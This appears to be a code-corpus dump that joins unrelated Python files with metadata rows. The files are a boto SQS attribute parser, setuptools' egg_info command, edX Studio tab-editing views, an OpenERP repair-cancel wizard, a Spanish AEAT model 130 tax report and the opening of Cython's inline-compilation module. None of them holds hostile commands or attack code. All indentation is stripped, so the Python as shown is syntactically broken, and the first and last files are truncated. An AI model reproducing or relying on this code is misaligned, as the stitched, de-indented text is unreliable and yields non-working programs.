# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents an SQS Attribute Name/Value set
"""
class Attributes(dict):
def __init__(self, parent):
self.parent = parent
self.current_key = None
self.current_value = None
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'Attribute':
self[self.current_key] = self.current_value
elif name == 'Name':
self.current_key = value
elif name == 'Value':
self.current_value = value
else:
setattr(self, name, value)
| mit | 2,047,162,343,982,661,600 | -7,756,429,318,355,415,000 | 36.347826 | 74 | 0.694412 | false |
ephoning/heroku-buildpack-python | vendor/distribute-0.6.36/setuptools/command/egg_info.py | 66 | 15621 | """setuptools.command.egg_info
Create a distribution's .egg-info directory and contents"""
# This module should be kept compatible with Python 2.3
import os, re, sys
from setuptools import Command
from distutils.errors import *
from distutils import log
from setuptools.command.sdist import sdist
from distutils.util import convert_path
from distutils.filelist import FileList as _FileList
from pkg_resources import parse_requirements, safe_name, parse_version, \
safe_version, yield_lines, EntryPoint, iter_entry_points, to_filename
from sdist import walk_revctrl
class egg_info(Command):
description = "create a distribution's .egg-info directory"
user_options = [
('egg-base=', 'e', "directory containing .egg-info directories"
" (default: top of the source tree)"),
('tag-svn-revision', 'r',
"Add subversion revision ID to version number"),
('tag-date', 'd', "Add date stamp (e.g. 20050528) to version number"),
('tag-build=', 'b', "Specify explicit tag to add to version number"),
('no-svn-revision', 'R',
"Don't add subversion revision ID [default]"),
('no-date', 'D', "Don't include date stamp [default]"),
]
boolean_options = ['tag-date', 'tag-svn-revision']
negative_opt = {'no-svn-revision': 'tag-svn-revision',
'no-date': 'tag-date'}
def initialize_options(self):
self.egg_name = None
self.egg_version = None
self.egg_base = None
self.egg_info = None
self.tag_build = None
self.tag_svn_revision = 0
self.tag_date = 0
self.broken_egg_info = False
self.vtags = None
def save_version_info(self, filename):
from setopt import edit_config
edit_config(
filename,
{'egg_info':
{'tag_svn_revision':0, 'tag_date': 0, 'tag_build': self.tags()}
}
)
def finalize_options (self):
self.egg_name = safe_name(self.distribution.get_name())
self.vtags = self.tags()
self.egg_version = self.tagged_version()
try:
list(
parse_requirements('%s==%s' % (self.egg_name,self.egg_version))
)
except ValueError:
raise DistutilsOptionError(
"Invalid distribution name or version syntax: %s-%s" %
(self.egg_name,self.egg_version)
)
if self.egg_base is None:
dirs = self.distribution.package_dir
self.egg_base = (dirs or {}).get('',os.curdir)
self.ensure_dirname('egg_base')
self.egg_info = to_filename(self.egg_name)+'.egg-info'
if self.egg_base != os.curdir:
self.egg_info = os.path.join(self.egg_base, self.egg_info)
if '-' in self.egg_name: self.check_broken_egg_info()
# Set package version for the benefit of dumber commands
# (e.g. sdist, bdist_wininst, etc.)
#
self.distribution.metadata.version = self.egg_version
# If we bootstrapped around the lack of a PKG-INFO, as might be the
# case in a fresh checkout, make sure that any special tags get added
# to the version info
#
pd = self.distribution._patched_dist
if pd is not None and pd.key==self.egg_name.lower():
pd._version = self.egg_version
pd._parsed_version = parse_version(self.egg_version)
self.distribution._patched_dist = None
def write_or_delete_file(self, what, filename, data, force=False):
"""Write `data` to `filename` or delete if empty
If `data` is non-empty, this routine is the same as ``write_file()``.
If `data` is empty but not ``None``, this is the same as calling
        ``delete_file(filename)``. If `data` is ``None``, then this is a no-op
unless `filename` exists, in which case a warning is issued about the
orphaned file (if `force` is false), or deleted (if `force` is true).
"""
if data:
self.write_file(what, filename, data)
elif os.path.exists(filename):
if data is None and not force:
log.warn(
"%s not set in setup(), but %s exists", what, filename
)
return
else:
self.delete_file(filename)
def write_file(self, what, filename, data):
"""Write `data` to `filename` (if not a dry run) after announcing it
`what` is used in a log message to identify what is being written
to the file.
"""
log.info("writing %s to %s", what, filename)
if sys.version_info >= (3,):
data = data.encode("utf-8")
if not self.dry_run:
f = open(filename, 'wb')
f.write(data)
f.close()
def delete_file(self, filename):
"""Delete `filename` (if not a dry run) after announcing it"""
log.info("deleting %s", filename)
if not self.dry_run:
os.unlink(filename)
def tagged_version(self):
version = self.distribution.get_version()
# egg_info may be called more than once for a distribution,
# in which case the version string already contains all tags.
if self.vtags and version.endswith(self.vtags):
return safe_version(version)
return safe_version(version + self.vtags)
def run(self):
self.mkpath(self.egg_info)
installer = self.distribution.fetch_build_egg
for ep in iter_entry_points('egg_info.writers'):
writer = ep.load(installer=installer)
writer(self, ep.name, os.path.join(self.egg_info,ep.name))
# Get rid of native_libs.txt if it was put there by older bdist_egg
nl = os.path.join(self.egg_info, "native_libs.txt")
if os.path.exists(nl):
self.delete_file(nl)
self.find_sources()
def tags(self):
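        # Illustrative example (figures assumed, not from this project): with
        # tag_build='.dev', an svn revision of 1234 and tag_date on 2013-05-28,
        # the returned suffix would be '.dev-r1234-20130528'.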
version = ''
if self.tag_build:
version+=self.tag_build
if self.tag_svn_revision and (
os.path.exists('.svn') or os.path.exists('PKG-INFO')
): version += '-r%s' % self.get_svn_revision()
if self.tag_date:
import time; version += time.strftime("-%Y%m%d")
return version
def get_svn_revision(self):
revision = 0
urlre = re.compile('url="([^"]+)"')
revre = re.compile('committed-rev="(\d+)"')
for base,dirs,files in os.walk(os.curdir):
if '.svn' not in dirs:
dirs[:] = []
continue # no sense walking uncontrolled subdirs
dirs.remove('.svn')
f = open(os.path.join(base,'.svn','entries'))
data = f.read()
f.close()
if data.startswith('10') or data.startswith('9') or data.startswith('8'):
data = map(str.splitlines,data.split('\n\x0c\n'))
del data[0][0] # get rid of the '8' or '9' or '10'
dirurl = data[0][3]
localrev = max([int(d[9]) for d in data if len(d)>9 and d[9]]+[0])
elif data.startswith('<?xml'):
dirurl = urlre.search(data).group(1) # get repository URL
localrev = max([int(m.group(1)) for m in revre.finditer(data)]+[0])
else:
log.warn("unrecognized .svn/entries format; skipping %s", base)
dirs[:] = []
continue
if base==os.curdir:
base_url = dirurl+'/' # save the root url
elif not dirurl.startswith(base_url):
dirs[:] = []
continue # not part of the same svn tree, skip it
revision = max(revision, localrev)
return str(revision or get_pkg_info_revision())
def find_sources(self):
"""Generate SOURCES.txt manifest file"""
manifest_filename = os.path.join(self.egg_info,"SOURCES.txt")
mm = manifest_maker(self.distribution)
mm.manifest = manifest_filename
mm.run()
self.filelist = mm.filelist
def check_broken_egg_info(self):
bei = self.egg_name+'.egg-info'
if self.egg_base != os.curdir:
bei = os.path.join(self.egg_base, bei)
if os.path.exists(bei):
log.warn(
"-"*78+'\n'
"Note: Your current .egg-info directory has a '-' in its name;"
'\nthis will not work correctly with "setup.py develop".\n\n'
'Please rename %s to %s to correct this problem.\n'+'-'*78,
bei, self.egg_info
)
self.broken_egg_info = self.egg_info
self.egg_info = bei # make it work for now
class FileList(_FileList):
"""File list that accepts only existing, platform-independent paths"""
def append(self, item):
if item.endswith('\r'): # Fix older sdists built on Windows
item = item[:-1]
path = convert_path(item)
if sys.version_info >= (3,):
try:
if os.path.exists(path) or os.path.exists(path.encode('utf-8')):
self.files.append(path)
except UnicodeEncodeError:
# Accept UTF-8 filenames even if LANG=C
if os.path.exists(path.encode('utf-8')):
self.files.append(path)
else:
log.warn("'%s' not %s encodable -- skipping", path,
sys.getfilesystemencoding())
else:
if os.path.exists(path):
self.files.append(path)
class manifest_maker(sdist):
template = "MANIFEST.in"
def initialize_options (self):
self.use_defaults = 1
self.prune = 1
self.manifest_only = 1
self.force_manifest = 1
def finalize_options(self):
pass
def run(self):
self.filelist = FileList()
if not os.path.exists(self.manifest):
self.write_manifest() # it must exist so it'll get in the list
self.filelist.findall()
self.add_defaults()
if os.path.exists(self.template):
self.read_template()
self.prune_file_list()
self.filelist.sort()
self.filelist.remove_duplicates()
self.write_manifest()
def write_manifest (self):
"""Write the file list in 'self.filelist' (presumably as filled in
by 'add_defaults()' and 'read_template()') to the manifest file
named by 'self.manifest'.
"""
# The manifest must be UTF-8 encodable. See #303.
if sys.version_info >= (3,):
files = []
for file in self.filelist.files:
try:
file.encode("utf-8")
except UnicodeEncodeError:
log.warn("'%s' not UTF-8 encodable -- skipping" % file)
else:
files.append(file)
self.filelist.files = files
files = self.filelist.files
if os.sep!='/':
files = [f.replace(os.sep,'/') for f in files]
self.execute(write_file, (self.manifest, files),
"writing manifest file '%s'" % self.manifest)
def warn(self, msg): # suppress missing-file warnings from sdist
if not msg.startswith("standard file not found:"):
sdist.warn(self, msg)
def add_defaults(self):
sdist.add_defaults(self)
self.filelist.append(self.template)
self.filelist.append(self.manifest)
rcfiles = list(walk_revctrl())
if rcfiles:
self.filelist.extend(rcfiles)
elif os.path.exists(self.manifest):
self.read_manifest()
ei_cmd = self.get_finalized_command('egg_info')
self.filelist.include_pattern("*", prefix=ei_cmd.egg_info)
def prune_file_list (self):
build = self.get_finalized_command('build')
base_dir = self.distribution.get_fullname()
self.filelist.exclude_pattern(None, prefix=build.build_base)
self.filelist.exclude_pattern(None, prefix=base_dir)
sep = re.escape(os.sep)
self.filelist.exclude_pattern(sep+r'(RCS|CVS|\.svn)'+sep, is_regex=1)
def write_file (filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
contents = "\n".join(contents)
if sys.version_info >= (3,):
contents = contents.encode("utf-8")
f = open(filename, "wb") # always write POSIX-style manifest
f.write(contents)
f.close()
def write_pkg_info(cmd, basename, filename):
log.info("writing %s", filename)
if not cmd.dry_run:
metadata = cmd.distribution.metadata
metadata.version, oldver = cmd.egg_version, metadata.version
metadata.name, oldname = cmd.egg_name, metadata.name
try:
# write unescaped data to PKG-INFO, so older pkg_resources
# can still parse it
metadata.write_pkg_info(cmd.egg_info)
finally:
metadata.name, metadata.version = oldname, oldver
safe = getattr(cmd.distribution,'zip_safe',None)
import bdist_egg; bdist_egg.write_safety_flag(cmd.egg_info, safe)
def warn_depends_obsolete(cmd, basename, filename):
if os.path.exists(filename):
log.warn(
"WARNING: 'depends.txt' is not used by setuptools 0.6!\n"
"Use the install_requires/extras_require setup() args instead."
)
def write_requirements(cmd, basename, filename):
dist = cmd.distribution
data = ['\n'.join(yield_lines(dist.install_requires or ()))]
for extra,reqs in (dist.extras_require or {}).items():
data.append('\n\n[%s]\n%s' % (extra, '\n'.join(yield_lines(reqs))))
cmd.write_or_delete_file("requirements", filename, ''.join(data))
def write_toplevel_names(cmd, basename, filename):
pkgs = dict.fromkeys(
[k.split('.',1)[0]
for k in cmd.distribution.iter_distribution_names()
]
)
cmd.write_file("top-level names", filename, '\n'.join(pkgs)+'\n')
def overwrite_arg(cmd, basename, filename):
write_arg(cmd, basename, filename, True)
def write_arg(cmd, basename, filename, force=False):
argname = os.path.splitext(basename)[0]
value = getattr(cmd.distribution, argname, None)
if value is not None:
value = '\n'.join(value)+'\n'
cmd.write_or_delete_file(argname, filename, value, force)
def write_entries(cmd, basename, filename):
ep = cmd.distribution.entry_points
if isinstance(ep,basestring) or ep is None:
data = ep
elif ep is not None:
data = []
for section, contents in ep.items():
if not isinstance(contents,basestring):
contents = EntryPoint.parse_group(section, contents)
contents = '\n'.join(map(str,contents.values()))
data.append('[%s]\n%s\n\n' % (section,contents))
data = ''.join(data)
cmd.write_or_delete_file('entry points', filename, data, True)
def get_pkg_info_revision():
# See if we can get a -r### off of PKG-INFO, in case this is an sdist of
# a subversion revision
#
if os.path.exists('PKG-INFO'):
f = open('PKG-INFO','rU')
for line in f:
match = re.match(r"Version:.*-r(\d+)\s*$", line)
if match:
return int(match.group(1))
f.close()
return 0
#
| mit | -9,050,504,761,539,396,000 | 6,514,908,799,820,552,000 | 31.141975 | 85 | 0.570002 | false |
ak2703/edx-platform | cms/djangoapps/contentstore/views/tabs.py | 125 | 7890 | """
Views related to course tabs
"""
from student.auth import has_course_author_access
from util.json_request import expect_json, JsonResponse
from django.http import HttpResponseNotFound
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.views.decorators.csrf import ensure_csrf_cookie
from django.views.decorators.http import require_http_methods
from edxmako.shortcuts import render_to_response
from xmodule.modulestore.django import modulestore
from xmodule.modulestore import ModuleStoreEnum
from xmodule.tabs import CourseTabList, CourseTab, InvalidTabsException, StaticTab
from opaque_keys.edx.keys import CourseKey, UsageKey
from ..utils import get_lms_link_for_item
__all__ = ['tabs_handler']
@expect_json
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT"))
def tabs_handler(request, course_key_string):
"""
    The RESTful handler for course tabs.
GET
html: return page for editing static tabs
json: not supported
PUT or POST
json: update the tab order. It is expected that the request body contains a JSON-encoded dict with entry "tabs".
The value for "tabs" is an array of tab locators, indicating the desired order of the tabs.
Creating a tab, deleting a tab, or changing its contents is not supported through this method.
Instead use the general xblock URL (see item.xblock_handler).
"""
course_key = CourseKey.from_string(course_key_string)
if not has_course_author_access(request.user, course_key):
raise PermissionDenied()
course_item = modulestore().get_course(course_key)
if 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
if request.method == 'GET':
raise NotImplementedError('coming soon')
else:
if 'tabs' in request.json:
return reorder_tabs_handler(course_item, request)
elif 'tab_id_locator' in request.json:
return edit_tab_handler(course_item, request)
else:
raise NotImplementedError('Creating or changing tab content is not supported.')
elif request.method == 'GET': # assume html
# get all tabs from the tabs list: static tabs (a.k.a. user-created tabs) and built-in tabs
# present in the same order they are displayed in LMS
tabs_to_render = []
for tab in CourseTabList.iterate_displayable(course_item, inline_collections=False):
if isinstance(tab, StaticTab):
# static tab needs its locator information to render itself as an xmodule
static_tab_loc = course_key.make_usage_key('static_tab', tab.url_slug)
tab.locator = static_tab_loc
tabs_to_render.append(tab)
return render_to_response('edit-tabs.html', {
'context_course': course_item,
'tabs_to_render': tabs_to_render,
'lms_link': get_lms_link_for_item(course_item.location),
})
else:
return HttpResponseNotFound()
def reorder_tabs_handler(course_item, request):
"""
    Helper function for handling a request to reorder tabs.
"""
# Tabs are identified by tab_id or locators.
# The locators are used to identify static tabs since they are xmodules.
# Although all tabs have tab_ids, newly created static tabs do not know
# their tab_ids since the xmodule editor uses only locators to identify new objects.
requested_tab_id_locators = request.json['tabs']
# original tab list in original order
old_tab_list = course_item.tabs
# create a new list in the new order
new_tab_list = []
for tab_id_locator in requested_tab_id_locators:
tab = get_tab_by_tab_id_locator(old_tab_list, tab_id_locator)
if tab is None:
return JsonResponse(
{"error": "Tab with id_locator '{0}' does not exist.".format(tab_id_locator)}, status=400
)
new_tab_list.append(tab)
# the old_tab_list may contain additional tabs that were not rendered in the UI because of
# global or course settings. so add those to the end of the list.
non_displayed_tabs = set(old_tab_list) - set(new_tab_list)
new_tab_list.extend(non_displayed_tabs)
# validate the tabs to make sure everything is Ok (e.g., did the client try to reorder unmovable tabs?)
try:
CourseTabList.validate_tabs(new_tab_list)
except InvalidTabsException, exception:
return JsonResponse(
{"error": "New list of tabs is not valid: {0}.".format(str(exception))}, status=400
)
# persist the new order of the tabs
course_item.tabs = new_tab_list
modulestore().update_item(course_item, request.user.id)
return JsonResponse()
def edit_tab_handler(course_item, request):
"""
Helper function for handling requests to edit settings of a single tab
"""
# Tabs are identified by tab_id or locator
tab_id_locator = request.json['tab_id_locator']
# Find the given tab in the course
tab = get_tab_by_tab_id_locator(course_item.tabs, tab_id_locator)
if tab is None:
return JsonResponse(
{"error": "Tab with id_locator '{0}' does not exist.".format(tab_id_locator)}, status=400
)
if 'is_hidden' in request.json:
# set the is_hidden attribute on the requested tab
tab.is_hidden = request.json['is_hidden']
modulestore().update_item(course_item, request.user.id)
else:
raise NotImplementedError('Unsupported request to edit tab: {0}'.format(request.json))
return JsonResponse()
def get_tab_by_tab_id_locator(tab_list, tab_id_locator):
"""
Look for a tab with the specified tab_id or locator. Returns the first matching tab.
"""
if 'tab_id' in tab_id_locator:
tab = CourseTabList.get_tab_by_id(tab_list, tab_id_locator['tab_id'])
elif 'tab_locator' in tab_id_locator:
tab = get_tab_by_locator(tab_list, tab_id_locator['tab_locator'])
return tab
def get_tab_by_locator(tab_list, usage_key_string):
"""
Look for a tab with the specified locator. Returns the first matching tab.
"""
tab_location = UsageKey.from_string(usage_key_string)
item = modulestore().get_item(tab_location)
static_tab = StaticTab(
name=item.display_name,
url_slug=item.location.name,
)
return CourseTabList.get_tab_by_id(tab_list, static_tab.tab_id)
# "primitive" tab edit functions driven by the command line.
# These should be replaced/deleted by a more capable GUI someday.
# Note that the command line UI identifies the tabs with 1-based
# indexing, but this implementation code is standard 0-based.
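# For example (sketch), a command-line request to delete "tab 3" corresponds to
# primitive_delete(course, 2) in this 0-based implementation.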
def validate_args(num, tab_type):
"Throws for the disallowed cases."
if num <= 1:
raise ValueError('Tabs 1 and 2 cannot be edited')
if tab_type == 'static_tab':
raise ValueError('Tabs of type static_tab cannot be edited here (use Studio)')
def primitive_delete(course, num):
"Deletes the given tab number (0 based)."
tabs = course.tabs
validate_args(num, tabs[num].get('type', ''))
del tabs[num]
# Note for future implementations: if you delete a static_tab, then Chris Dodge
# points out that there's other stuff to delete beyond this element.
# This code happens to not delete static_tab so it doesn't come up.
modulestore().update_item(course, ModuleStoreEnum.UserID.primitive_command)
def primitive_insert(course, num, tab_type, name):
"Inserts a new tab at the given number (0 based)."
validate_args(num, tab_type)
new_tab = CourseTab.from_json({u'type': unicode(tab_type), u'name': unicode(name)})
tabs = course.tabs
tabs.insert(num, new_tab)
modulestore().update_item(course, ModuleStoreEnum.UserID.primitive_command)
| agpl-3.0 | 6,634,828,489,788,347,000 | 3,806,930,545,987,237,000 | 37.866995 | 120 | 0.679341 | false |
credativUK/OCB | addons/mrp_repair/wizard/cancel_repair.py | 52 | 3699 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv,fields
from openerp.tools.translate import _
class repair_cancel(osv.osv_memory):
_name = 'mrp.repair.cancel'
_description = 'Cancel Repair'
def cancel_repair(self, cr, uid, ids, context=None):
""" Cancels the repair
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return:
"""
if context is None:
context = {}
record_id = context and context.get('active_id', False) or False
assert record_id, _('Active ID not Found')
repair_order_obj = self.pool.get('mrp.repair')
repair_line_obj = self.pool.get('mrp.repair.line')
repair_order = repair_order_obj.browse(cr, uid, record_id, context=context)
if repair_order.invoiced or repair_order.invoice_method == 'none':
repair_order_obj.action_cancel(cr, uid, [record_id], context=context)
else:
raise osv.except_osv(_('Warning!'),_('Repair order is not invoiced.'))
return {'type': 'ir.actions.act_window_close'}
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
""" Changes the view dynamically
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param context: A standard dictionary
@return: New arch of view.
"""
if context is None:
context = {}
res = super(repair_cancel, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)
record_id = context and context.get('active_id', False) or False
active_model = context.get('active_model')
if not record_id or (active_model and active_model != 'mrp.repair'):
return res
repair_order = self.pool.get('mrp.repair').browse(cr, uid, record_id, context=context)
if not repair_order.invoiced:
res['arch'] = """
<form string="Cancel Repair" version="7.0">
<header>
<button name="cancel_repair" string="_Yes" type="object" class="oe_highlight"/>
or
<button string="Cancel" class="oe_link" special="cancel"/>
</header>
<label string="Do you want to continue?"/>
</form>
"""
return res
repair_cancel()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -8,809,869,015,440,510,000 | 1,593,869,383,462,216,200 | 41.517241 | 151 | 0.592322 | false |
cubells/l10n-spain | l10n_es_aeat_mod130/models/mod130.py | 1 | 10541 | # Copyright 2014-2019 Tecnativa - Pedro M. Baeza
from odoo import _, api, fields, exceptions, models
def trunc(f, n):
    """Truncate the float ``f`` to ``n`` decimal places (no rounding)."""
slen = len('%.*f' % (n, f))
return float(str(f)[:slen])
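# Illustrative example (assumed figures): trunc(123.456, 2) -> 123.45
# (truncated, not rounded).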
class L10nEsAeatMod130Report(models.Model):
_description = "AEAT 130 report"
_inherit = "l10n.es.aeat.report"
_name = "l10n.es.aeat.mod130.report"
_aeat_number = '130'
    company_partner_id = fields.Many2one('res.partner',
                                         string='Company partner',
                                         related='company_id.partner_id',
                                         store=True)
    currency_id = fields.Many2one('res.currency', string='Currency',
                                  related='company_id.currency_id',
                                  store=True)
activity_type = fields.Selection(
[('primary', 'Actividad agrícola, ganadera, forestal o pesquera'),
('other', 'Actividad distinta a las anteriores')],
string='Tipo de actividad', states={'draft': [('readonly', False)]},
readonly=True, required=True, default='other')
has_deduccion_80 = fields.Boolean(
string="¿Deducción por art. 80 bis?",
states={'draft': [('readonly', False)]}, readonly=True,
help="Permite indicar si puede beneficiarse de la deducción por "
"obtención de rendimientos de actividades económicas a efectos del "
"pago fraccionado por cumplir el siguiente requisito:\n Que, en el "
"primer trimestre del ejercicio o en el primer trimestre de inicio de "
"actividades, la suma del resultado de elevar al año el importe de la "
"casilla 03 y/o, en su caso, el resultado de elevar al año el 25 por "
"100 de la casilla 08, sea igual o inferior a 12.000 euros. En los "
"supuestos de inicio de la actividad a lo largo del ejercicio en la "
"elevación al año se tendrán en consideración los días que resten "
"hasta el final del año.", default=False)
has_prestamo = fields.Boolean(
string="¿Préstamo para vivienda habitual?",
states={'draft': [('readonly', False)]}, readonly=True,
help="Permite indicar si destina cantidades al pago de préstamos "
"para la adquisición o rehabilitación de la vivienda habitual. Si "
"marca la casilla, se podrá realiza un 2% de deducción sobre el "
"importe de la casilla [03], con un máximo de 660,14 € por trimestre, "
"o del 2% de la casilla [08], con un máximo de 660,14 euros anuales. "
"\nDebe consultar las excepciones para las que no se computaría "
"la deducción a pesar del préstamo.", default=False)
comments = fields.Char(
string="Observaciones", size=350, readonly=True,
help="Observaciones que se adjuntarán con el modelo",
states={'draft': [('readonly', False)]})
casilla_01 = fields.Monetary(
string="Casilla [01] - Ingresos",
readonly=True,
)
real_expenses = fields.Monetary(
string="Gastos reales",
help="Gastos en el periodo sin contar con el 5% adicional de difícil "
"justificación.",
)
non_justified_expenses = fields.Monetary(
string="Gastos de difícil justificación",
help="Calculado como el 5% del rendimiento del periodo (ingresos - "
"gastos reales).",
)
casilla_02 = fields.Monetary(string="Casilla [02] - Gastos", readonly=True)
casilla_03 = fields.Monetary(
string="Casilla [03] - Rendimiento",
readonly=True,
)
casilla_04 = fields.Monetary(string="Casilla [04] - IRPF", readonly=True)
casilla_05 = fields.Monetary(string="Casilla [05]")
casilla_06 = fields.Monetary(string="Casilla [06]", readonly=True)
casilla_07 = fields.Monetary(string="Casilla [07]", readonly=True)
casilla_08 = fields.Monetary(
string="Casilla [08] - Ingresos primario",
readonly=True,
)
casilla_09 = fields.Monetary(
string="Casilla [09] - IRPF primario",
readonly=True,
)
casilla_10 = fields.Monetary(string="Casilla [10]", readonly=True)
casilla_11 = fields.Monetary(string="Casilla [11]", readonly=True)
casilla_12 = fields.Monetary(string="Casilla [12]", readonly=True)
casilla_13 = fields.Monetary(
string="Casilla [13] - Deducción art. 80 bis",
readonly=True,
)
casilla_14 = fields.Monetary(string="Casilla [14]", readonly=True)
casilla_15 = fields.Monetary(string="Casilla [15]", readonly=True)
casilla_16 = fields.Monetary(
string="Casilla [16] - Deducción por pago de hipoteca",
readonly=True,
)
casilla_17 = fields.Monetary(string="Casilla [17]", readonly=True)
casilla_18 = fields.Monetary(string="Casilla [18]", readonly=True)
result = fields.Monetary(
string="Resultado",
compute="_compute_result",
store=True,
)
tipo_declaracion = fields.Selection(
selection=[
('I', 'A ingresar'),
('N', 'Negativa'),
('B', 'A deducir')
],
string='Tipo declaración',
compute="_compute_tipo_declaracion",
store=True,
)
@api.depends('casilla_18', 'casilla_17')
def _compute_result(self):
for report in self:
report.result = report.casilla_17 - report.casilla_18
@api.depends('result')
def _compute_tipo_declaracion(self):
for report in self:
if report.result < 0:
report.tipo_declaracion = (
"B" if report.period_type != '4T' else "N"
)
else:
report.tipo_declaracion = "I"
@api.multi
def _calc_ingresos_gastos(self):
self.ensure_one()
aml_obj = self.env['account.move.line']
date_start = '%s-01-01' % self.year
extra_domain = [
('company_id', '=', self.company_id.id),
('date', '>=', date_start),
('date', '<=', self.date_end),
]
groups = aml_obj.read_group([
('account_id.code', '=like', '7%'),
] + extra_domain, ['balance'], [])
incomes = groups[0]['balance'] and -groups[0]['balance'] or 0.0
groups = aml_obj.read_group([
('account_id.code', '=like', '6%'),
] + extra_domain, ['balance'], [])
expenses = groups[0]['balance'] or 0.0
return (incomes, expenses)
@api.multi
def _calc_prev_trimesters_data(self):
self.ensure_one()
amount = 0
prev_reports = self._get_previous_fiscalyear_reports(self.date_start)
for prev in prev_reports:
if prev.casilla_07 > 0:
amount += prev.casilla_07 - prev.casilla_16
return amount
@api.multi
def calculate(self):
for report in self:
if report.activity_type == 'primary':
raise exceptions.Warning(_('Este tipo de actividad no '
'está aún soportado por el módulo.'))
if report.has_deduccion_80:
raise exceptions.Warning(_(
'No se pueden calcular por el '
'momento declaraciones que contengan deducciones por el '
'artículo 80 bis.'))
vals = {}
if report.activity_type == 'other':
ingresos, gastos = report._calc_ingresos_gastos()
vals['casilla_01'] = ingresos
vals['real_expenses'] = gastos
rendimiento_bruto = (ingresos - gastos)
if rendimiento_bruto > 0:
vals['non_justified_expenses'] = round(
rendimiento_bruto * 0.05, 2
)
else:
vals['non_justified_expenses'] = 0.0
vals['casilla_02'] = gastos + vals['non_justified_expenses']
                # Net income (rendimiento)
vals['casilla_03'] = ingresos - vals['casilla_02']
                # IRPF - Truncate the result, as the AEAT does
if vals['casilla_03'] < 0:
vals['casilla_04'] = 0.0
else:
vals['casilla_04'] = trunc(0.20 * vals['casilla_03'], 2)
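                # Worked example (illustrative figures only): ingresos=10000 and
                # gastos reales=2000 give non-justified expenses=400 (5% of
                # 8000), casilla_02=2400, casilla_03=7600 and
                # casilla_04=trunc(0.20 * 7600, 2)=1520.0.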
                # Fractional payments already made in previous quarters
vals['casilla_05'] = report._calc_prev_trimesters_data()
vals['casilla_07'] = (vals['casilla_04'] - vals['casilla_05'] -
report.casilla_06)
vals['casilla_12'] = vals['casilla_07']
if vals['casilla_12'] < 0:
vals['casilla_12'] = 0.0
else:
                # TODO: Model 130 for primary activities
vals['casilla_12'] = vals['casilla_11']
            # TODO: Article 80 bis deduction
vals['casilla_13'] = 0.0
vals['casilla_14'] = vals['casilla_12'] - vals['casilla_13']
            # TODO: Carry over negative results from previous quarters
vals['casilla_15'] = 0.0
            # Deduction for main-residence mortgage payments
if report.has_prestamo and vals['casilla_14'] > 0:
                # Truncate the result, as the AEAT does
deduccion = trunc(0.02 * vals['casilla_03'], 2)
if report.activity_type == 'other':
if deduccion > 660.14:
deduccion = 660.14
else:
raise exceptions.Warning(_('No implementado'))
dif = vals['casilla_14'] - vals['casilla_15']
if deduccion > dif:
deduccion = dif
vals['casilla_16'] = deduccion
else:
vals['casilla_16'] = 0.0
vals['casilla_17'] = (vals['casilla_14'] - vals['casilla_15'] -
vals['casilla_16'])
report.write(vals)
return True
@api.multi
def button_confirm(self):
"""Check its records"""
msg = ""
for report in self:
if report.type == 'C' and not report.casilla_18:
msg = _(
'Debe introducir una cantidad en la casilla 18 como '
'ha marcado la casilla de declaración complementaria.'
)
if msg:
raise exceptions.ValidationError(msg)
return super(L10nEsAeatMod130Report, self).button_confirm()
| agpl-3.0 | -3,657,639,101,636,251,000 | -840,379,408,278,233,700 | 42.551867 | 79 | 0.550114 | false |
collinjackson/mojo | third_party/cython/src/Cython/Build/Inline.py | 89 | 10878 | import sys, os, re, inspect
import imp
try:
import hashlib
except ImportError:
import md5 as hashlib
from distutils.core import Distribution, Extension
from distutils.command.build_ext import build_ext
import Cython
from Cython.Compiler.Main import Context, CompilationOptions, default_options
from Cython.Compiler.ParseTreeTransforms import CythonTransform, SkipDeclarations, AnalyseDeclarationsTransform
from Cython.Compiler.TreeFragment import parse_from_strings
from Cython.Build.Dependencies import strip_string_literals, cythonize, cached_function
from Cython.Compiler import Pipeline
from Cython.Utils import get_cython_cache_dir
import cython as cython_module
# A utility function to convert user-supplied ASCII strings to unicode.
if sys.version_info[0] < 3:
def to_unicode(s):
if not isinstance(s, unicode):
return s.decode('ascii')
else:
return s
else:
to_unicode = lambda x: x
class AllSymbols(CythonTransform, SkipDeclarations):
def __init__(self):
CythonTransform.__init__(self, None)
self.names = set()
def visit_NameNode(self, node):
self.names.add(node.name)
@cached_function
def unbound_symbols(code, context=None):
code = to_unicode(code)
if context is None:
context = Context([], default_options)
from Cython.Compiler.ParseTreeTransforms import AnalyseDeclarationsTransform
tree = parse_from_strings('(tree fragment)', code)
